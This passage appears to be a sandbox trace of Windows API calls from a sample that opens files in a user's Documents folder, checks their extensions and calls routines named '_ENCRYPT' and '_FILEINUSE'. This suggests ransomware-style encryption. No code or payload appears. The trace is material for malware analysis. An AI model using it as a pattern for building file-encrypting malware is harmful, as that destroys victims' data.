hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0033.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0033.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0033.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0033.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.019] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.021] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0033.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cd18 [0033.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cd18, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0033.022] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0033.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0033.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.022] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.022] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0033.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.022] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0033.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0033.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.023] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0033.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0033.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.023] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0033.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccd0 [0033.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ccd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0033.023] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.023] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0033.023] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0033.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0033.023] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0033.023] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0033.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0033.023] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0033.023] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0033.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.024] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.024] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.024] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.024] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0033.024] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.024] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.024] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0033.024] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.024] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.024] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.024] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.024] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.024] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.024] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.025] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0033.025] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.025] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0033.025] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.025] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h3wz1pxdd.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.025] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.025] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.025] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.025] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0033.025] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.025] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.025] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0033.025] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.025] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0033.026] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.026] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0033.026] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0033.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.026] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.026] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbb0c630, ftCreationTime.dwHighDateTime=0x1d59cf6, ftLastAccessTime.dwLowDateTime=0x859ca230, ftLastAccessTime.dwHighDateTime=0x1d58c43, ftLastWriteTime.dwLowDateTime=0x859ca230, ftLastWriteTime.dwHighDateTime=0x1d58c43, nFileSizeHigh=0x0, nFileSizeLow=0x70c8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="H3Wz1PxDd.pptx", cAlternateFileName="H3WZ1P~1.PPT")) returned 0x7c20c0 [0033.026] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.026] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbb0c630, ftCreationTime.dwHighDateTime=0x1d59cf6, ftLastAccessTime.dwLowDateTime=0x859ca230, ftLastAccessTime.dwHighDateTime=0x1d58c43, ftLastWriteTime.dwLowDateTime=0x859ca230, ftLastWriteTime.dwHighDateTime=0x1d58c43, 